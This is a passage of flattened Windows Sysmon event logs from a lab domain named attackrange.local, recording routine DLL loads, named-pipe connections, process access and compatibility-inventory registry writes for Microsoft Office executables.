14:58:01.232{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 734700x800000000000000076758Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:00.717{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 734700x800000000000000076757Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:00.732{A7A01FEF-EBF8-607E-DA0D-00000000BB01}4764C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 18141800x800000000000000076756Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.201{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076755Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.201{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 23542300x800000000000000076754Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.201{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5A24AE5C7BB7D297C54392FF40A874BC,SHA256=52F625C67F5FAF5B59D46E53CD2298288F1CC96342AA8E3EACE1D9446A299B82,IMPHASH=00000000000000000000000000000000falsetrue 18141800x800000000000000076753Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.201{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076752Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.201{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\FTA_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000076751Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.186{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076750Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.107{A7A01FEF-EBF9-607E-E30D-00000000BB01}35001288C:\Windows\system32\conhost.exe{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076749Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.092{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBF9-607E-E30D-00000000BB01}3500C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076748Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.092{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076747Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.092{A7A01FEF-B626-607E-1300-00000000BB01}12642404C:\Windows\System32\svchost.exe{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\pcasvc.dll+43591|c:\windows\system32\pcasvc.dll+22bed|C:\Windows\SYSTEM32\ntdll.dll+7de1d|C:\Windows\SYSTEM32\ntdll.dll+3a969|C:\Windows\SYSTEM32\ntdll.dll+1e86f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000076746Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.092{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 23542300x800000000000000050459Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:01.181{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67B982000AA9A0C3840D8EC0EB695C75,SHA256=64CD3E3B5606009106ECE230253B52B66583325A32D20B924910E4DC422C1E69,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000077445Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\olcfg.exe|a02976be835ef87a\Publishermicrosoft corporation 13241300x800000000000000077444Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\olcfg.exe|a02976be835ef87a\LowerCaseLongPathc:\program files\microsoft office\root\office16\olcfg.exe 13241300x800000000000000077443Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\ohub32.exe|1cbd8b063e0dbfd8\BinProductVersion16.0.13127.21336 13241300x800000000000000077442Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\ohub32.exe|1cbd8b063e0dbfd8\LinkDate03/05/2021 01:03:29 13241300x800000000000000077441Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\ohub32.exe|1cbd8b063e0dbfd8\Publishermicrosoft corporation 13241300x800000000000000077440Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\ohub32.exe|1cbd8b063e0dbfd8\LowerCaseLongPathc:\program files\microsoft office\root\vfs\windows\installer\{90160000-000f-0000-1000-0000000ff1ce}\ohub32.exe 13241300x800000000000000077439Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\officeappguardwi|1d315891d4000f76\BinProductVersion16.0.13127.21348 13241300x800000000000000077438Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\officeappguardwi|1d315891d4000f76\LinkDate03/06/2021 23:34:17 13241300x800000000000000077437Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\officeappguardwi|1d315891d4000f76\Publishermicrosoft corporation 13241300x800000000000000077436Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\officeappguardwi|1d315891d4000f76\LowerCaseLongPathc:\program files\microsoft office\root\office16\officeappguardwin32.exe 13241300x800000000000000077435Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\ocpubmgr.exe|bf7b23fd8b5a21e6\BinProductVersion16.0.13127.21348 13241300x800000000000000077434Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\ocpubmgr.exe|bf7b23fd8b5a21e6\LinkDate03/06/2021 23:35:07 13241300x800000000000000077433Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\ocpubmgr.exe|bf7b23fd8b5a21e6\Publishermicrosoft corporation 13241300x800000000000000077432Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\ocpubmgr.exe|bf7b23fd8b5a21e6\LowerCaseLongPathc:\program files\microsoft office\root\office16\ocpubmgr.exe 13241300x800000000000000077431Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\namecontrolserve|6e9ebbbd25720a1f\BinProductVersion16.0.13127.21348 13241300x800000000000000077430Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\namecontrolserve|6e9ebbbd25720a1f\LinkDate03/06/2021 23:33:55 13241300x800000000000000077429Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\namecontrolserve|6e9ebbbd25720a1f\Publishermicrosoft corporation 13241300x800000000000000077428Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\namecontrolserve|6e9ebbbd25720a1f\LowerCaseLongPathc:\program files\microsoft office\root\office16\namecontrolserver.exe 13241300x800000000000000077427Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msqry32.exe|f4966ad2a4f8b618\BinProductVersion16.0.13127.21348 13241300x800000000000000077426Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msqry32.exe|f4966ad2a4f8b618\LinkDate03/06/2021 23:43:15 13241300x800000000000000077425Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msqry32.exe|f4966ad2a4f8b618\Publishermicrosoft corporation 13241300x800000000000000077424Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msqry32.exe|f4966ad2a4f8b618\LowerCaseLongPathc:\program files\microsoft office\root\office16\msqry32.exe 13241300x800000000000000077423Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\mspub.exe|627686ba4cede96f\BinProductVersion16.0.13127.21348 13241300x800000000000000077422Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\mspub.exe|627686ba4cede96f\LinkDate03/06/2021 23:37:33 13241300x800000000000000077421Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\mspub.exe|627686ba4cede96f\Publishermicrosoft corporation 13241300x800000000000000077420Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\mspub.exe|627686ba4cede96f\LowerCaseLongPathc:\program files\microsoft office\root\office16\mspub.exe 13241300x800000000000000077419Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msoxmled.exe|9d4c86224f942115\BinProductVersion16.0.13127.20164 13241300x800000000000000077418Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msoxmled.exe|9d4c86224f942115\LinkDate08/10/2020 01:33:30 13241300x800000000000000077417Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msoxmled.exe|9d4c86224f942115\Publishermicrosoft corporation 13241300x800000000000000077416Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msoxmled.exe|9d4c86224f942115\LowerCaseLongPathc:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\msoxmled.exe 13241300x800000000000000077415Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msouc.exe|fb7096179e0993a1\BinProductVersion16.0.13127.21348 13241300x800000000000000077414Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msouc.exe|fb7096179e0993a1\LinkDate03/06/2021 23:33:58 13241300x800000000000000077413Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msouc.exe|fb7096179e0993a1\Publishermicrosoft corporation 13241300x800000000000000077412Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msouc.exe|fb7096179e0993a1\LowerCaseLongPathc:\program files\microsoft office\root\office16\msouc.exe 13241300x800000000000000077411Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msouc.exe|abee62b8e3008d9b\BinProductVersion16.0.13127.21336 13241300x800000000000000077410Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msouc.exe|abee62b8e3008d9b\LinkDate03/04/2021 07:50:31 13241300x800000000000000077409Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msouc.exe|abee62b8e3008d9b\Publishermicrosoft corporation 13241300x800000000000000077408Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msouc.exe|abee62b8e3008d9b\LowerCaseLongPathc:\program files\microsoft office\root\vfs\windows\installer\{90160000-000f-0000-1000-0000000ff1ce}\msouc.exe 13241300x800000000000000077407Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msotd.exe|1846727dbe2e5345\BinProductVersion16.0.13127.21348 13241300x800000000000000077406Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msotd.exe|1846727dbe2e5345\LinkDate03/06/2021 23:37:07 13241300x800000000000000077405Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msotd.exe|1846727dbe2e5345\Publishermicrosoft corporation 13241300x800000000000000077404Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msotd.exe|1846727dbe2e5345\LowerCaseLongPathc:\program files\microsoft office\root\office16\msotd.exe 13241300x800000000000000077403Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msosync.exe|8f2f17f2ae97d344\BinProductVersion16.0.13127.21348 13241300x800000000000000077402Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msosync.exe|8f2f17f2ae97d344\LinkDate03/06/2021 23:33:54 13241300x800000000000000077401Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msosync.exe|8f2f17f2ae97d344\Publishermicrosoft corporation 13241300x800000000000000077400Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msosync.exe|8f2f17f2ae97d344\LowerCaseLongPathc:\program files\microsoft office\root\office16\msosync.exe 13241300x800000000000000077399Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msosrec.exe|7e420f036fdc982e\BinProductVersion16.0.13127.21348 13241300x800000000000000077398Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msosrec.exe|7e420f036fdc982e\LinkDate03/06/2021 23:35:25 13241300x800000000000000077397Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msosrec.exe|7e420f036fdc982e\Publishermicrosoft corporation 13241300x800000000000000077396Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msosrec.exe|7e420f036fdc982e\LowerCaseLongPathc:\program files\microsoft office\root\office16\msosrec.exe 13241300x800000000000000077395Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msoicons.exe|3da37cfb4950ecae\BinProductVersion16.0.11126.20058 13241300x800000000000000077394Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 